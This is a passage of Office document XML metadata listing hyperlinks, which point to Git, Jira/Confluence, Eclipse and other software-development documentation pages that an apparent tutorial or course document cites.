        <vt:lpwstr>https://git-scm.com/docs/git-init</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376277</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>528</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2/Getting-Started-First-Time-Git-Setup.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490481</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>525</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2293813</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>522</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-format-patch.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8126510</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>519</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/downloads.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5832714</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>516</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://eclipsesource.com/blogs/tutorials/egit-tutorial.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915210</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>513</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://help.eclipse.org/2019-03/index.jsp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5374032</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>510</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.eclipse.org/downloads/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359417</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>507</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815781</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>504</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/alldoc/atlassian-documentation-32243719.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4522063</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>501</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwareserver073/advanced-searching-861256227.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8126585</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>498</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/searching-for-issues-764478280.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684772</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>495</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/basic-searching-764478306.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6422581</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>492</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/deploying-a-release-764478183.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4653069</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>489</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063339</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>486</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7733286</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>483</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.atlassian.com/agile/tutorials/sprints.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8060990</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>480</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.atlassian.com/software/jira/guides/getting-started/best-practices.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>196702</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>477</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.atlassian.com/project-management.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310799</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>474</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/get-started-with-jira-core/create-a-project-917965385.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2293813</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>471</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-format-patch.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>393225</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>468</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://github.com/ILUWATAR/JAVA-DESIGN-PATTERNS</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5111876</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>465</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2/Git-Branching-Branches-in-a-Nutshell.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490481</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>462</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177419</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>459</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-checkout</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2228271</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>456</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-reset</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3145773</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>453</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-commit</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5374027</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>450</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-add</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490481</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>447</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3145775</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>444</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-status</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063277</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>441</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-clone</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5701697</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>438</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-init</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915204</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>435</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2/Customizing-Git-Git-Configuration.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376277</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>432</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2/Getting-Started-First-Time-Git-Setup.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2621473</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>429</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/book/en/v2/Getting-Started-Installing-Git.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8126510</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>426</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/downloads.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4390926</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>423</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/advanced-searching-764478330.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4522063</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>420</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwareserver073/advanced-searching-861256227.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8126585</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>417</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/searching-for-issues-764478280.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684772</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>414</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/basic-searching-764478306.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6422581</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>411</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/deploying-a-release-764478183.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4653069</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>408</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063339</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>405</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7733286</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>402</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.atlassian.com/agile/tutorials/sprints.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439576</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>399</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/watch-share-and-comment-on-issues-962349057.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3670134</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>396</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jiracorecloud/working-with-issues-765593800.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4653069</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>393</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6553641</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>390</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/adminjiracloud/issue-types-844500742.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194373</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>387</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.atlassian.com/agile/tutorials/issues.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063339</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>384</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2556013</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>381</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jiracorecloud/working-with-boards-800712866.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>262144</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.idalko.com/jira-workflow-best-practices.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4587615</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>375</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/jiracoreserver073/creating-issues-and-sub-tasks-861257329.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310799</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>372</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/get-started-with-jira-core/create-a-project-917965385.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815781</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>369</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://confluence.atlassian.com/alldoc/atlassian-documentation-32243719.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8060990</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>366</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.atlassian.com/software/jira/guides/getting-started/best-practices.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>196702</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>363</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.atlassian.com/project-management.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7209066</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>360</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikibooks.org/wiki/Introduction_to_Software_Engineering/Process/Life_Cycle.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4718653</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>357</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikipedia.org/wiki/Systems_development_life_cycle.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3670119</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>354</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/help/idea/using-git-integration.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5832714</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>351</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://eclipsesource.com/blogs/tutorials/egit-tutorial.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3932203</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>348</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://netbeans.org/kb/docs/java/quickstart.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3211298</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>345</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
